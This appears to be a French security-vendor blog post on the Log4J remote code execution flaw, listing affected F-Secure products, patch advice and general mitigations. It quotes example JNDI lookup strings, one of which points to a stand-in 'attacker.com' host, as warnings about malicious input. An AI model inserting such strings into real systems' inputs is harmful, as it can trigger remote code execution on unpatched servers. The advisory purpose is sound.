Il est presque impossible de caractériser, pour l’heure, l’ampleur du risque associé aux applications vulnérables. Si une chaîne de caractères contrôlée par l’utilisateur et ciblant la vulnérabilité est journalisée, l’exploit peut être exécuté à distance. Pour faire simple, le hacker peut utiliser la vulnérabilité en question pour amener le système ciblé à exécuter du code à distance. La nature de ce code malveillant dépend des objectifs de piratage du hacker.

Un véritable séisme

Cette crise rappelle combien il est difficile de sécuriser les multiples couches de logiciels professionnels. Pour les logiciels hérités, notamment les anciennes versions de Java, les entreprises devront développer leurs propres patchs ou bien elles seront dans l’incapacité de procéder à une correction immédiate de la vulnérabilité. Elles risquent également d’éprouver des difficultés à patcher les fonctions de journalisation de Log4k en temps réel, dans un contexte où le risque est très élevé et où les fonctions de journalisation jouent un rôle critique.

Toutes les mesures correctives recommandées doivent être appliquées « sans attendre », insiste sur son blog la Cybersecurity & Infrastructure Security Agency.

Les particuliers ne peuvent pas faire grand-chose, si ce n’est installer les mises à jour des différents services dès qu’elles sont disponibles. Les entreprises, en revanche, doivent œuvrer sans relâche pour installer tous les patchs nécessaires et sécuriser leurs propres systèmes. Et chaque fois qu’un risque est éliminé, une évaluation doit déterminer si un incident actif est en cours sur les systèmes concernés.

Des vulnérabilités presque partout

Log4J est partout : de très nombreuses applications utilisent cette bibliothèque de journalisation. Les hackers peuvent donc rechercher des vulnérabilités presque n’importe où.

« S’il vous plaît, ne changez pas le nom de votre Tesla ou de votre iPhone en $jndi:ldap ://url/a .... vous risqueriez d’obtenir un résultat assez inattendu », explique Erka Koivunen, Chief Information Security Officer chez F-Secure.

L’utilisation du langage de formatage de Log4J peut déclencher du code dans des applications vulnérables, partout dans le monde. La simple commande "$jndi:ldap ://attacker.com/pwnyourserver" dans un chat Minecraft sur un système non patché a, par exemple, entraîné une véritable crise de sécurité chez Microsoft.

Les produits F-Secure sont-ils concernés ?

F-Secure a identifié plusieurs produits affectés par cette vulnérabilité :
F-Secure Policy Manager
F-Secure Policy Manager Proxy
F-Secure Endpoint Proxy
F-Secure Elements Connector

Les versions Windows et Linux de ces produits doivent être considérées comme vulnérables. Si votre produit F-Secure est exposé à internet, vous DEVEZ immédiatement procéder aux vérifications qui s’imposent et appliquer un correctif si nécessaire.

Comment patcher les produits F-Secure ?

F-Secure a créé un patch de sécurité pouvant être installé pour corriger cette vulnérabilité. Cliquez ici pour consulter les informations les plus récentes.

Plus généralement, quelles mesures doivent être prises pour tous les logiciels, quel qu’en soit le fournisseur ?

Restreignez les accès réseau, ou limitez-les aux sites de confiance. Si votre système est incapable de se connecter à internet pour récupérer le code malveillant, le hacker ne pourra pas atteindre ses objectifs.

Vérifiez régulièrement auprès des fournisseurs si des patchs ou d’autres mesures d’atténuation des vulnérabilités sont disponibles.